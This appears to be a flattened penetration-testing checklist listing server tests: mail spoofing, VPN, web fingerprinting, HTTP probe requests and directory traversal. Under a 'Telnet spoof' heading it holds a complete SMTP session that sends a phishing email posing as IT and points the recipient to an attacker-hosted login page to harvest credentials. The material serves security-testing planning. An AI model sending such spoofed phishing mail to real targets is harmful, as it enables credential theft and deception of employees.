|

Server Specific Vulnerabilities:
Server Specific Tests
-
Databases
-
Mail
-
Scans
-
Fingerprint
-
Spoofable
-
Telnet spoof
-
telnet target_IP 25helo target.commail from: XXXX@XXX.comrcpt to: administrator@target.comdataX-Sender: XXXX@XXX.comX-Originating-IP: [192.168.1.1]X-Originating-Email: [XXXX@XXX.com]MIME-Version: 1.0To: <administrator@target.com>From: < XXXX@XXX.com >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer, The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108 /hacme.html>www.target.com/login</a>Online Security Manager.Target LtdXXXX@XXX.com.
-
Relays
-
VPN
-
Scanning
-
Fingerprinting
-
PSK Crack
-
Web
-
Vulnerability Assessment
-
Permissions
-
Scans
-
Fingerprinting
-
Other
-
HTTP
-
Commands
-
JUNK / HTTP/1.0
-
HEAD / HTTP/9.3
-
OPTIONS / HTTP/1.0
-
HEAD / HTTP/1.0
-
GET /images HTTP/1.0
-
PROPFIND / HTTP/1.0
-
Modules
-
WebDAV
-
ASP.NET
-
Frontpage
-
OWA
-
IIS ISAPI
-
PHP
-
OpenSSL
-
File Extensions
-
.ASP, .HTM, .PHP, .EXE, .IDQ
-
HTTPS
-
Commands
-
JUNK / HTTP/1.0
-
HEAD / HTTP/9.3
-
OPTIONS / HTTP/1.0
-
HEAD / HTTP/1.0
-
Commands
-
JUNK / HTTP/1.0
-
HEAD / HTTP/9.3
-
OPTIONS / HTTP/1.0
-
HEAD / HTTP/1.0
-
File Extensions
-
.ASP, .HTM, .PHP, .EXE, .IDQ
-
Directory Traversal
|
|
|